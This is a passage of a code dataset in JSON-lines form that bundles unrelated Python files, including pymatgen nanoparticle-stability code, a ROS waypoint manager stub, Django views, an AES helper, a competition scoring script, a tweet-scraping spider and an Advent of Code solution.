(max(self.locpot_along_c) - min(self.locpot_along_c))\n min_points = int(min_points_frac * len(self.locpot_along_c))\n peak_i = self.locpot_along_c.index(self.vacuum_locpot)\n all_flat = []\n for i in range(len(self.along_c)):\n if peak_i - min_points < i < peak_i + min_points:\n if abs(self.vacuum_locpot - self.locpot_along_c[i]) > conv_within:\n all_flat.append(False)\n else:\n all_flat.append(True)\n return all(all_flat)\n\n @classmethod\n def from_files(cls, poscar_filename, locpot_filename, outcar_filename, shift=0, blength=3.5):\n \"\"\"\n Initializes a WorkFunctionAnalyzer from POSCAR, LOCPOT, and OUTCAR files.\n\n Args:\n poscar_filename (str): The path to the POSCAR file.\n locpot_filename (str): The path to the LOCPOT file.\n outcar_filename (str): The path to the OUTCAR file.\n shift (float): The shift value. Defaults to 0.\n blength (float): The longest bond length in the material.\n Used to handle pbc for noncontiguous slab layers. Defaults to 3.5.\n\n Returns:\n WorkFunctionAnalyzer: A WorkFunctionAnalyzer instance.\n \"\"\"\n locpot = Locpot.from_file(locpot_filename)\n outcar = Outcar(outcar_filename)\n return cls(\n Structure.from_file(poscar_filename),\n locpot.get_average_along_axis(2),\n outcar.efermi,\n shift=shift,\n blength=blength,\n )\n\n\n@due.dcite(\n Doi(\"10.1021/nl404557w\"),\n description=\"Nanoscale stabilization of sodium oxides: Implications for Na-O2 batteries\",\n)\nclass NanoscaleStability:\n \"\"\"A class for analyzing the stability of nanoparticles of different\n polymorphs with respect to size. The Wulff shape will be the model for the\n nanoparticle. Stability will be determined by an energetic competition between the\n weighted surface energy (surface energy of the Wulff shape) and the bulk energy. A\n future release will include a 2D phase diagram (e.g. wrt size vs chempot for adsorbed\n or non-stoichiometric surfaces). Based on the following work:\n\n Kang, S., Mo, Y., Ong, S. P., & Ceder, G. (2014). Nanoscale\n stabilization of sodium oxides: Implications for Na-O2\n batteries. Nano Letters, 14(2), 1016-1020.\n https://doi.org/10.1021/nl404557w\n\n Attributes:\n se_analyzers (list[SurfaceEnergyPlotter]): Each item corresponds to a different polymorph.\n symprec (float): Tolerance for symmetry finding. See WulffShape.\n \"\"\"\n\n def __init__(self, se_analyzers, symprec=1e-5):\n \"\"\"Analyzes the nanoscale stability of different polymorphs.\"\"\"\n self.se_analyzers = se_analyzers\n self.symprec = symprec\n\n def solve_equilibrium_point(self, analyzer1, analyzer2, delu_dict=None, delu_default=0, units=\"nanometers\"):\n \"\"\"\n Gives the radial size of two particles where equilibrium is reached\n between both particles. NOTE: the solution here is not the same\n as the solution visualized in the plot because solving for r\n requires that both the total surface area and volume of the\n particles are functions of r.\n\n Args:\n analyzer1 (SurfaceEnergyPlotter): Analyzer associated with the\n first polymorph\n analyzer2 (SurfaceEnergyPlotter): Analyzer associated with the\n second polymorph\n delu_dict (dict): Dictionary of the chemical potentials to be set as\n constant. Note the key should be a sympy Symbol object of the\n format: Symbol(\"delu_el\") where el is the name of the element.\n delu_default (float): Default value for all unset chemical potentials\n units (str): Can be nanometers or Angstrom\n\n Returns:\n Particle radius in nm\n \"\"\"\n # Set up\n wulff1 = analyzer1.wulff_from_chempot(\n delu_dict=delu_dict or {}, delu_default=delu_default, symprec=self.symprec\n )\n wulff2 = analyzer2.wulff_from_chempot(\n delu_dict=delu_dict or {}, delu_default=delu_default, symprec=self.symprec\n )\n\n # Now calculate r\n delta_gamma = wulff1.weighted_surface_energy - wulff2.weighted_surface_energy\n delta_E = self.bulk_gform(analyzer1.ucell_entry) - self.bulk_gform(analyzer2.ucell_entry)\n r = (-3 * delta_gamma) / (delta_E)\n\n return r / 10 if units == \"nanometers\" else r\n\n def wulff_gform_and_r(\n self,\n wulffshape,\n bulk_entry,\n r,\n from_sphere_area=False,\n r_units=\"nanometers\",\n e_units=\"keV\",\n normalize=False,\n scale_per_atom=False,\n ):\n \"\"\"\n Calculates the formation energy of the particle with arbitrary radius r.\n\n Args:\n wulffshape (WulffShape): Initial, unscaled WulffShape\n bulk_entry (ComputedStructureEntry): Entry of the corresponding bulk.\n r (float (Ang)): Arbitrary effective radius of the WulffShape\n from_sphere_area (bool): There are two ways to calculate the bulk\n formation energy. Either by treating the volume and thus surface\n area of the particle as a perfect sphere, or as a Wulff shape.\n r_units (str): Can be nanometers or Angstrom\n e_units (str): Can be keV or eV\n normalize (bool): Whether or not to normalize energy by volume\n scale_per_atom (True): Whether or not to normalize by number of\n atoms in the particle\n\n Returns:\n particle formation energy (float in keV), effective radius\n \"\"\"\n # Set up\n miller_se_dict = wulffshape.miller_energy_dict\n new_wulff = self.scaled_wulff(wulffshape, r)\n new_wulff_area = new_wulff.miller_area_dict\n\n # calculate surface energy of the particle\n if not from_sphere_area:\n # By approximating the particle as a Wulff shape\n w_vol = new_wulff.volume\n tot_wulff_se = 0\n for hkl, v in new_wulff_area.items():\n tot_wulff_se += miller_se_dict[hkl] * v\n Ebulk = self.bulk_gform(bulk_entry) * w_vol\n new_r = new_wulff.effective_radius\n\n else:\n # By approximating the particle as a perfect sphere\n w_vol = (4 / 3) * np.pi * r**3\n sphere_sa = 4 * np.pi * r**2\n tot_wulff_se = wulffshape.weighted_surface_energy * sphere_sa\n Ebulk = self.bulk_gform(bulk_entry) * w_vol\n new_r = r\n\n new_r = new_r / 10 if r_units == \"nanometers\" else new_r\n e = Ebulk + tot_wulff_se\n e = e / 1000 if e_units == \"keV\" else e\n e = e / ((4 / 3) * np.pi * new_r**3) if normalize else e\n bulk_struct = bulk_entry.structure\n density = len(bulk_struct) / bulk_struct.volume\n e = e / (density * w_vol) if scale_per_atom else e\n\n return e, new_r\n\n @staticmethod\n def bulk_gform(bulk_entry):\n \"\"\"\n Returns the formation energy of the bulk.\n\n Args:\n bulk_entry (ComputedStructureEntry): Entry of the corresponding bulk.\n\n Returns:\n float: bulk formation energy (in eV)\n \"\"\"\n return bulk_entry.energy / bulk_entry.structure.volume\n\n def scaled_wulff(self, wulffshape, r):\n \"\"\"\n Scales the Wulff shape with an effective radius r. Note that the resulting\n Wulff does not necessarily have the same effective radius as the one\n provided. The Wulff shape is scaled by its surface energies where first\n the surface energies are scale by the minimum surface energy and then\n multiplied by the given effective radius.\n\n Args:\n wulffshape (WulffShape): Initial, unscaled WulffShape\n r (float): Arbitrary effective radius of the WulffShape\n\n Returns:\n WulffShape (scaled by r)\n \"\"\"\n # get the scaling ratio for the energies\n r_ratio = r / wulffshape.effective_radius\n miller_list = list(wulffshape.miller_energy_dict)\n # Normalize the magnitude of the facet normal vectors\n # of the Wulff shape by the minimum surface energy.\n se_list = np.array(list(wulffshape.miller_energy_dict.values()))\n # Scale the magnitudes by r_ratio\n scaled_se = se_list * r_ratio\n\n return WulffShape(wulffshape.lattice, miller_list, scaled_se, symprec=self.symprec)\n\n def plot_one_stability_map(\n self,\n analyzer,\n max_r,\n delu_dict=None,\n label=\"\",\n increments=50,\n delu_default=0,\n plt=None,\n from_sphere_area=False,\n e_units=\"keV\",\n r_units=\"nanometers\",\n normalize=False,\n scale_per_atom=False,\n ):\n \"\"\"\n Returns the plot of the formation energy of a particle against its\n effect radius.\n\n Args:\n analyzer (SurfaceEnergyPlotter): Analyzer associated with the\n first polymorph\n max_r (float): The maximum radius of the particle to plot up to.\n delu_dict (dict): Dictionary of the chemical potentials to be set as\n constant. Note the key should be a sympy Symbol object of the\n format: Symbol(\"delu_el\") where el is the name of the element.\n label (str): Label of the plot for legend\n increments (int): Number of plot points\n delu_default (float): Default value for all unset chemical potentials\n plt (pyplot): Plot\n from_sphere_area (bool): There are two ways to calculate the bulk\n formation energy. Either by treating the volume and thus surface\n area of the particle as a perfect sphere, or as a Wulff shape.\n r_units (str): Can be nanometers or Angstrom\n e_units (str): Can be keV or eV\n normalize (str): Whether or not to normalize energy by volume\n \"\"\"\n plt = plt or pretty_plot(width=8, height=7)\n\n wulffshape = analyzer.wulff_from_chempot(delu_dict=delu_dict, delu_default=delu_default, symprec=self.symprec)\n\n gform_list, r_list = [], []\n for r in np.linspace(1e-6, max_r, increments):\n gform, r = self.wulff_gform_and_r(\n wulffshape,\n analyzer.ucell_entry,\n r,\n from_sphere_area=from_sphere_area,\n r_units=r_units,\n e_units=e_units,\n normalize=normalize,\n scale_per_atom=scale_per_atom,\n )\n gform_list.append(gform)\n r_list.append(r)\n\n ru = \"nm\" if r_units == \"nanometers\" else r\"\\AA\"\n plt.xlabel(rf\"Particle radius (${ru}$)\")\n eu = f\"${e_units}/{ru}^3$\"\n plt.ylabel(rf\"$G_{{form}}$ ({eu})\")\n\n plt.plot(r_list, gform_list, label=label)\n\n return plt\n\n def plot_all_stability_map(\n self,\n max_r,\n increments=50,\n delu_dict=None,\n delu_default=0,\n plt=None,\n labels=None,\n from_sphere_area=False,\n e_units=\"keV\",\n r_units=\"nanometers\",\n normalize=False,\n scale_per_atom=False,\n ):\n \"\"\"\n Returns the plot of the formation energy of a particles\n of different polymorphs against its effect radius.\n\n Args:\n max_r (float): The maximum radius of the particle to plot up to.\n increments (int): Number of plot points\n delu_dict (dict): Dictionary of the chemical potentials to be set as\n constant. Note the key should be a sympy Symbol object of the\n format: Symbol(\"delu_el\") where el is the name of the element.\n delu_default (float): Default value for all unset chemical potentials\n plt (pyplot): Plot\n labels (list): List of labels for each plot, corresponds to the\n list of se_analyzers\n from_sphere_area (bool): There are two ways to calculate the bulk\n formation energy. Either by treating the volume and thus surface\n area of the particle as a perfect sphere, or as a Wulff shape.\n \"\"\"\n plt = plt or pretty_plot(width=8, height=7)\n\n for i, analyzer in enumerate(self.se_analyzers):\n label = labels[i] if labels else \"\"\n plt = self.plot_one_stability_map(\n analyzer,\n max_r,\n delu_dict,\n label=label,\n plt=plt,\n increments=increments,\n delu_default=delu_default,\n from_sphere_area=from_sphere_area,\n e_units=e_units,\n r_units=r_units,\n normalize=normalize,\n scale_per_atom=scale_per_atom,\n )\n\n return plt\n\n\ndef sub_chempots(gamma_dict, chempots):\n \"\"\"\n Uses dot product of numpy array to sub chemical potentials\n into the surface grand potential. This is much faster\n than using the subs function in sympy.\n\n Args:\n gamma_dict (dict): Surface grand potential equation\n as a coefficient dictionary\n chempots (dict): Dictionary assigning each chemical\n potential (key) in gamma a value\n\n Returns:\n Surface energy as a float\n \"\"\"\n coeffs = [gamma_dict[k] for k in gamma_dict]\n chempot_vals = []\n for k in gamma_dict:\n if k not in chempots:\n chempot_vals.append(k)\n elif k == 1:\n chempot_vals.append(1)\n else:\n chempot_vals.append(chempots[k])\n\n return np.dot(coeffs, chempot_vals)\n","repo_name":"materialsproject/pymatgen","sub_path":"pymatgen/analysis/surface_analysis.py","file_name":"surface_analysis.py","file_ext":"py","file_size_in_byte":80684,"program_lang":"python","lang":"en","doc_type":"code","stars":1185,"dataset":"github-code","pt":"38"} +{"seq_id":"71980589230","text":"import rclpy\nfrom rclpy.node import Node\nfrom custom_interfaces.srv import GetWaypoints, SetWaypoints\nfrom custom_interfaces.msg import Waypoint\nfrom std_srvs.srv import Trigger\nimport json\n\n\nclass WaypointManager(Node):\n def __init__(self):\n super().__init__(\"waypoint_manager\")\n self.get_waypoints_srv = self.create_service(\n GetWaypoints, \"get_robot_waypoints\", self.get_robot_waypoints_callback\n )\n self.set_waypoint_srv = self.create_service(\n SetWaypoints, \"set_waypoints\", self.set_waypoints_callback\n )\n self.reset_waypoint_srv = self.create_service(\n Trigger, \"reset_waypoints\", self.reset_waypoints_callback\n )\n self.robot_inital_geo = (47.740114, 10.322442)\n\n self.waypoint_list_geo = [] # needs to be an array of Waypoint() messages\n self.waypoint_list_robot_frame = []\n self.set_waypoint_client = self.create_client(SetWaypoints, \"set_waypoints\")\n\n def set_waypoints_callback(self, request, response):\n response.success = False\n self.get_logger().info(f\"Task 1: Loaded waypoints: {self.waypoint_list_geo}\")\n # COMPLETE YOUR CODE HERE\n response.success = True\n\n return response\n\n def convert_waypoints_to_robot_frame(self):\n # COMPLETE YOUR CODE HERE\n self.get_logger().info(\n f\" Task 2: Waypoints in robot frame: {self.waypoint_list_robot_frame}\"\n )\n\n pass\n\n def plot_waypoints(self):\n self.get_logger().info(\n f\" Task 3: Plot and save a graph of loaded waypoints in robot coordinate frame (png)\"\n )\n # COMPLETE YOUR CODE HERE\n pass\n\n def get_robot_waypoints_callback(self, request, response):\n response.waypoints = self.waypoint_list_geo\n\n return response\n\n def reset_waypoints_callback(self, request, response):\n response.waypoints = []\n\n return response\n\n def call_set_waypoints_geo(self, request):\n self.future = self.set_waypoint_client.call_async(request)\n rclpy.spin_until_future_complete(self, self.future)\n return self.future.result()\n\n\ndef main(args=None):\n rclpy.init(args=args)\n\n waypoint_manager = WaypointManager()\n\n set_waypoints_msg = SetWaypoints.Request()\n set_waypoints_msg.file_path = \"/your_path/waypoints.geojson\"\n response = waypoint_manager.call_set_waypoints_geo(set_waypoints_msg)\n if response.success == True:\n waypoint_manager.convert_waypoints_to_robot_frame()\n waypoint_manager.plot_waypoints()\n else:\n print(\"No waypoints loaded\")\n\n rclpy.spin(waypoint_manager)\n\n rclpy.shutdown()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Paltech-GmbH/paltech_assignment","sub_path":"paltech_assignment/paltech_assignment/waypoint_manager.py","file_name":"waypoint_manager.py","file_ext":"py","file_size_in_byte":2709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"21761119043","text":"from django.shortcuts import render\nfrom Database.models import Course, CourseUsedRecord, Customer\nimport datetime\nfrom Tools.SessionManager import SessionManager\nfrom django.contrib import messages\ndef CourseUsed(request):\n '''全面更换form'''\n username_app = Course.objects.all()\n if request.method == 'POST':\n if request.POST.get('Submit'): # 如果是Submit传来的请求\n username = request.POST.get('vipname')\n course_name = request.POST.get('coursename')\n if course_name == 'all':\n if username == 'all':\n user_list = CourseUsedRecord.objects.all()\n used_times = 0\n else:\n user_list = CourseUsedRecord.objects.filter(username=username)\n used_times = 0\n else:\n if username == 'all':\n user_list = CourseUsedRecord.objects.filter(coursename=course_name)\n used_times = 0\n else:\n user_list = CourseUsedRecord.objects.filter(username=username, coursename=course_name)\n used_times = CourseUsedRecord.objects.filter(username=username, coursename=course_name).count()\n else:\n if request.POST.get('newlyRecord'): # 如果是newlyRecord传来的请求\n username = request.POST.get('vipname')\n course_name = request.POST.get('coursename')\n '''因为username就是主键,所以修正这个写法为get,默认返回值设置为None,后面判断是不是none即可'''\n flags = Customer.objects.filter(username=username).exists()\n if username == '' or username == 'all' or course_name == '' or course_name == 'all' or flags == False: # 用户名为空\n messages.warning(request, \"输入错误!\")\n return render(request, 'CourseUsed.html', locals()) # 跳转\n else: # 在username,course_name新建一条数据库记录,自动生成一个id作为主键\n '''使用递增数字作为主键,时间作为新字段属性'''\n new_number = 1\n CourseUsedRecord.objects.create(number=new_number, username=username, coursename=course_name)\n return render(request, 'CourseUsed.html', locals())\n return render(request, 'CourseUsed.html', locals())\n\n\ndef moremessage_username(request, username):\n user_list = CourseUsedRecord.objects.filter(username=username)\n return render(request, 'CourseOpt.html', locals())\n\n\ndef moremessage_coursename(request, coursename):\n user_list = CourseUsedRecord.objects.filter(coursename=coursename)\n return render(request, 'UserCourseUsedRecord.html', locals())\n\n\ndef UserCourseUsed(request):\n sessionManager=SessionManager(request)\n username=sessionManager.getUsername()\n if request.method == 'POST':\n coursename = request.POST.get('coursename')\n if coursename == 'all':\n user_list = CourseUsedRecord.objects.filter(username=username)\n used_times = 0\n else:\n user_list = CourseUsedRecord.objects.filter(username=username, coursename=coursename)\n used_times = CourseUsedRecord.objects.filter(username=username, coursename=coursename).count()\n return render(request, 'UserCourseUsedRecord.html', locals())\n","repo_name":"shao0099876/AmyYoga","sub_path":"AmyYoga/AmyYoga/CourseUsed/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3419,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"42894353468","text":"import os, re, display, packages, config\n\nos.system(\"clear\")\ndef menu():\n #default menu\n display.banner()\n display.sep()\nmenu()\noption = input(\"user@holy-grail-installer> \")\n\nwhile option != 0:\n if option == \"0\":\n #null\n print()\n elif option == \"exit\":\n #close program\n print(\"Goodbye\")\n exit()\n elif option == 'ls':\n #listing commands\n display.sep()\n display.commands()\n elif option == 'greeks install' or option == '1':\n packages.greeks_install()\n config.greek_grub_config()\n config.greeks_bashrc()\n config.greeks_qemu_config()\n config.greeks_script_setup()\n elif option == '2' or option == 'auto setup':\n print(\"Invalid option please download https://github.com/cronos-hash/auto_gpu_passthrough\")\n elif option == \"clear\" or \"3\":\n #clear terminal option\n display.clear()\n elif option == \"exit\":\n #close program\n print(\"Goodbye!\")\n quit()\n exit()\n sys.exit()\n else:\n print(\"Not a command\")\n print()\n #user bar\n option = input(\"user@holy-grail-installer> \")\n","repo_name":"Z16Z4/myconf","sub_path":"python_version/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"24342806284","text":"# -*- coding: utf-8 -*-\n\nfrom Crypto.Cipher import AES\nimport Crypto.Random\nimport binascii\nimport sys\n\nBS = AES.block_size\npad = lambda x: x + (BS - len(x) % BS) * chr(BS - len(x) % BS).encode(\"ascii\")\n\nif sys.version_info[0] == 2:\n\tunpad = lambda s : s[0:-ord(s[-1])]\nelse:\n\tunpad = lambda s : s[0:-s[-1]]\n\nclass AESCipher:\n\tdef __init__( self, key ):\n\t\t\"\"\"\n\t\tRequires hex encoded param as a key\n\t\t\"\"\"\n\t\tself.key = binascii.a2b_hex(key)\n\n\tdef encrypt( self, raw ):\n\t\t\"\"\"\n\t\tReturns hex encoded encrypted value!\n\t\t\"\"\"\n\t\traw = pad(raw)\n\t\tiv = Crypto.Random.new().read(AES.block_size);\n\t\tcipher = AES.new( self.key, AES.MODE_CBC, iv )\n#\t\treturn binascii.b2a_hex( iv + cipher.encrypt( raw ) )\n\t\treturn iv + cipher.encrypt( raw )\n\n\tdef decrypt( self, enc, iv=None ):\n\t\t\"\"\"\n\t\tRequires hex encoded param to decrypt\n\t\t\"\"\"\n\t\tif iv == None:\n\t\t\tiv = enc[:16]\n\t\t\tenc= enc[16:]\n\n\t\tcipher = AES.new(self.key, AES.MODE_CBC, iv )\n\t\treturn unpad(cipher.decrypt( enc))\n","repo_name":"005jon/plugin.video.antiktv","sub_path":"AESCipher.py","file_name":"AESCipher.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"6046157966","text":"# coding=utf-8\nimport json\nimport sys\nimport os\nimport string\nimport numpy as np\nimport time\nimport glob\nimport zipfile\nimport shutil\n\n\ndef glob_matching(fn, fmt):\n matched_fns = list(glob.iglob('submit/**/submission.csv', recursive=True))\n if len(matched_fns) == 0:\n raise Exception(\"You submitted a {} file, but we didn't find submission.csv in it. Please check your submission.\".format(fmt))\n if len(matched_fns) > 1:\n raise Exception(\"You submitted a {} file, but there are more than one files named submission.csv in it. Please check your submission.\".format(fmt))\n return matched_fns[0]\n\n\ndef read_submission(submit_path, reference, k=5):\n # check whether the path of submitted file exists\n if not os.path.exists(submit_path):\n raise Exception(\"The submission file is not found!\")\n\n # evaluate a zip file\n if os.path.isdir(\"submit\"):\n shutil.rmtree(\"submit\")\n if submit_path.endswith('.zip'):\n try:\n with zipfile.ZipFile(submit_path, \"r\") as zip_data:\n zip_data.extractall(\"submit\")\n zip_data.close()\n except:\n raise Exception('The submitted zip file is corrputed! Please check your submission.')\n real_submit_path = glob_matching('submission.csv', 'zip')\n # evaluate a csv file\n else:\n real_submit_path = submit_path\n\n submission_dict = {}\n ref_qids = set(reference.keys())\n\n with open(real_submit_path) as fin:\n for line in fin:\n line = line.strip()\n records = [elem.strip() for elem in line.split(',')]\n if records[0] not in ref_qids:\n continue\n qid = records[0]\n # check whether there are K products for each query\n if len(records[1:]) != k:\n raise Exception('Query-id {} has wrong number of predicted product-ids! Require {}, but {} founded.'.format(qid, k, len(records[1:])))\n # check whether there exists an empty prediction for any query\n if any([len(r) == 0 for r in records[1:]]):\n raise Exception('Query-id {} has an empty prediction at rank {}! Pleace check again!'.format(qid, records[1:].index(\"\") + 1)) \n # check whether there exist an invalid prediction for any query\n for rank, r in enumerate(records[1:]):\n if not all([char in string.digits for char in r]):\n raise Exception('Query-id {} has an invalid prediction product-id \\\"{}\\\" at rank {}'.format(qid, r, rank + 1))\n # check whether there are duplicate predicted products for a single query\n if len(set(records[1:])) != k:\n raise Exception('Query-id {} has duplicate products in your prediction. Pleace check again!'.format(qid))\n submission_dict[qid] = records[1:] # here we save the list of string\n \n # check if any query is missing in the submission\n pred_qids = set(submission_dict.keys())\n nopred_qids = ref_qids - pred_qids\n if len(nopred_qids) != 0:\n raise Exception('The following query-ids have no prediction in your submission, please check again: {}'.format(\", \".join(nopred_qids)))\n\n return submission_dict\n \n\n# compute dcg@k for a single sample\ndef dcg_at_k(r, k):\n r = np.asfarray(r)[:k]\n if r.size:\n return r[0] + np.sum(r[1:] / np.log2(np.arange(3, r.size + 2)))\n return 0.\n\n\n# compute ndcg@k (dcg@k / idcg@k) for a single sample\ndef get_ndcg(r, ref, k):\n dcg_max = dcg_at_k(ref, k)\n if not dcg_max:\n return 0.\n dcg = dcg_at_k(r, k)\n return dcg / dcg_max\n\n\ndef dump_2_json(info, path):\n with open(path, 'w') as output_json_file:\n json.dump(info, output_json_file)\n\n\ndef report_error_msg(detail, showMsg, out_p):\n error_dict=dict()\n error_dict['errorDetail']=detail\n error_dict['errorMsg']=showMsg\n error_dict['score']=0\n error_dict['scoreJson']={}\n error_dict['success']=False\n dump_2_json(error_dict,out_p)\n\n\ndef report_score(score, out_p):\n result = dict()\n result['success']=True\n result['score'] = score\n result['scoreJson'] = {'score': score}\n dump_2_json(result,out_p)\n\n\nif __name__==\"__main__\":\n # the path of answer json file (eg. valid_answer.json)\n standard_path = sys.argv[1]\n # the path of prediction file (csv or zip)\n submit_path = sys.argv[2]\n # the score will be dumped into this output json file\n out_path = sys.argv[3]\n\n print(\"Read standard from %s\" % standard_path)\n print(\"Read user submit file from %s\" % submit_path)\n\n try:\n # read ground-truth\n reference = json.load(open(standard_path))\n \n # read predictions\n k = 5\n predictions = read_submission(submit_path, reference, k)\n\n # compute score for each query\n score_sum = 0.\n for qid in reference.keys():\n ground_truth_ids = set([str(pid) for pid in reference[qid]])\n ref_vec = [1.0] * len(ground_truth_ids)\n pred_vec = [1.0 if pid in ground_truth_ids else 0.0 for pid in predictions[qid]]\n score_sum += get_ndcg(pred_vec, ref_vec, k)\n # the higher score, the better\n score = score_sum / len(reference)\n report_score(score, out_path)\n print(\"The evaluation finished successfully.\")\n except Exception as e:\n report_error_msg(e.args[0], e.args[0], out_path)\n print(\"The evaluation failed: {}\".format(e.args[0]))","repo_name":"Ai-Light/KDD2020Multimodalities","sub_path":"code/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":5469,"program_lang":"python","lang":"en","doc_type":"code","stars":62,"dataset":"github-code","pt":"38"} +{"seq_id":"42602679520","text":"n=int(input()) # 로프 개수\nrope = [] # 로프 길이 배열\ndiction = {} # 로프 길이마다의 개수\nfor _ in range(n):\n rope.append(int(input()))\n\nrope.sort()\n\nfor i in rope:\n if i in diction:\n diction[i] = diction[i] +1\n else:\n diction[i] = 1\nsumarr = []\nlength = len(rope)\nfor j in diction:\n sumarr.append(j*length)\n length = length - diction[j]\nsumarr.sort()\nprint(sumarr[-1])","repo_name":"kimss373/solvealgorithm","sub_path":"백준/실버4/2217번_로프.py","file_name":"2217번_로프.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"74530777069","text":"import json\nfrom scrapy import Spider\n\n\nclass TweetsSpider(Spider):\n name = 'tweets'\n allowed_domains = ['trumptwitterarchive.com']\n start_urls = ['http://www.trumptwitterarchive.com/data/realdonaldtrump/2020.json',]\n\n def parse(self, response):\n responsejson = json.loads(response.body)\n\n for tweet in responsejson:\n yield{'source': tweet['source'],\n 'id_str': tweet['id_str'],\n 'text': tweet['text'],\n 'created_at': tweet['created_at'],\n 'retweet_count': tweet['retweet_count'],\n 'in_reply_to_user_id_str': tweet['in_reply_to_user_id_str'],\n 'favorite_count': tweet['favorite_count'],\n 'is_retweet': tweet['is_retweet']}\n\n","repo_name":"inu847/Scraping_modul","sub_path":"tweettrump_json_spider/tweettrump_json_spider/spiders/tweets.py","file_name":"tweets.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"28480569574","text":"def one_diff(nums):\n s = sorted(set(nums)) #list of unique nums in sorted order\n v = [nums.count(s[i]) + nums.count(s[i]+1) for i in range(len(s))]\n #for every element in the sorted & setted array, count the number of repeating elements and add it to the number of the repeating elements + 1. only repeating with the repeating + 1 will satisfy condition of all the elmeents in the array to be <= 1. return the max occurences\n return max(v)\n\nnums = [12,4,1,3,4,5,5,5,8,10,10,10]\nz = one_diff(nums)\nprint(z)\n\n\n\n\n\n\n\n\n\n\n\n# def one_diff(n,nums):\n# #check diff of every value. if <= 1, push to less_ones array.\n# #return length of less_ones array\n# less_ones = []\n# for f in nums:\n# for s in nums:\n# # print(abs(f-s))\n# if f == s:\n# continue\n# else:\n# if (abs(f-s) <= 1):\n# less_ones.append(f)\n# less_ones.append(s)\n# # less_ones.add(s)\n# print(less_ones)\n# return len(less_ones)\n\n# nums = [1,2,4,8,10,11,12,13,14,18,22,25,12]\n# x = one_diff(len(nums),nums)\n# print(x)\n\n# \n\n# x=sorted(set(a))\n# return max([a.count(x[i])+a.count(x[i]+1) for i in range(len(x))]+[2])\n\n# nums = [12,4,1,3,4,5,5,5,8,10,10,10]\n# pn = pick_nums(len(nums),nums)\n# print(pn)\n\n# arr = [1,2,3]\n# range(len(arr))","repo_name":"ayunas/hacker-rank","sub_path":"one_diff.py","file_name":"one_diff.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"31644074068","text":"\"\"\"\nDate: 12/20/2020\nName: Rio Weil\nTitle: day6.py\nDecription: 2020 AoC D6 - Counting and common letters in lists of strings\n\"\"\"\nimport numpy as np\n\n## Functions:\ndef group_answers(input_lines):\n \"\"\"\n Organizes input so that answers are grouped together into sublists.\n \"\"\"\n group_sublists = []\n current_sublist = []\n for answer in input_lines:\n if answer == '':\n group_sublists.append(current_sublist)\n current_sublist = []\n else:\n current_sublist.append(answer)\n group_sublists.append(current_sublist) # For the last group\n return group_sublists\n\nalphabet = [\"a\", \"b\", \"c\", \"d\", \"e\", \"f\", \"g\", \"h\", \"i\", \"j\", \"k\", \"l\", \n\"m\", \"n\", \"o\", \"p\", \"q\", \"r\", \"s\", \"t\", \"u\", \"v\", \"w\", \"x\", \"y\", \"z\"]\n\ndef count_all_letters(low):\n \"\"\"\n Returns count of all unique letters in a list of words\n \"\"\"\n joined_word = \"\".join(elem for elem in low)\n counter = 0\n for letter in alphabet:\n if letter in joined_word:\n counter = counter + 1\n return counter\n\n\ndef count_matching_letters(low):\n \"\"\"\n Returns the count of letters common to all words in a list of words.\n \"\"\"\n letters_to_check = []\n firstw = low[0]\n counter = 0\n for i in range(len(firstw)):\n letters_to_check.append(firstw[i:i+1])\n for letter in letters_to_check:\n f = lambda word: letter in word\n if all(f(x) for x in low):\n counter = counter + 1\n return counter\n\n\n## Solution:\n\nlines = open('input.txt', \"r\").read().splitlines()\nsorted_groups = group_answers(lines)\n\nsol1 = 0\nsol2 = 0\nfor group in sorted_groups:\n sol1 = count_all_letters(group) + sol1\n sol2 = count_matching_letters(group) + sol2","repo_name":"RioWeil/aoc-2020","sub_path":"Day6/day6.py","file_name":"day6.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"13226628766","text":"import numpy as np\nimport netCDF4 as nc\nimport datetime as dt\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport matplotlib.dates as mdates\nimport matplotlib.colors as mcolors\nimport locale\nimport os\n#\nfrom matplotlib.colors import LogNorm, LinearSegmentedColormap\n#\n# import wdm\nimport src.processing.motion_correction as motcor\nfrom src.processing.wdm.spectra import polar_spectrum, colorax\nfrom src.processing.processing_data import (\n ProcessingData, eddy_correlation_flux, nanmean, stokes_drift\n )\n#\nplt.ion()\nnp.warnings.filterwarnings('ignore')\nlocale.setlocale(locale.LC_TIME, \"es_ES\")\n\n\n# main class {{{\nclass PlotSpectra(object):\n\n \"\"\"Class to create a cool animation of the wave spectra\"\"\"\n\n def __init__(self, metafile, t_ini, t_end, number_of_minutes=30):\n \"\"\"Initialize the class\"\"\"\n\n # perform the data processing\n self.metafile = metafile\n self.p = ProcessingData(self.metafile, number_of_minutes)\n self.metadata = self.p.metadata\n\n # load netcdf file\n # TODO: extrat filename from METAFILE\n bomm_name = self.metadata[\"name\"]\n nm = int(number_of_minutes)\n filename = f\"{bomm_name}/level2/{bomm_name}_level2_{nm}min.nc\" \n self.filename = self.metadata[\"basepath\"] + filename\n dataset = nc.Dataset(self.filename, \"r\")\n\n # load time and fine coincident dates\n time = nc.num2date(dataset[\"time\"][:], dataset[\"time\"].units)\n i, j = np.argmin(abs(time - t_ini)), np.argmin(abs(time - t_end))\n self.time = time[i:j]\n\n # bomm title\n self.title = dataset.title[:10].strip()\n \n # directional spectra\n self.wfrq = dataset[\"wfrq\"][:]\n self.dirs = dataset[\"dirs\"][:]\n self.E = dataset[\"E\"][i:j,:]\n self.Hs = 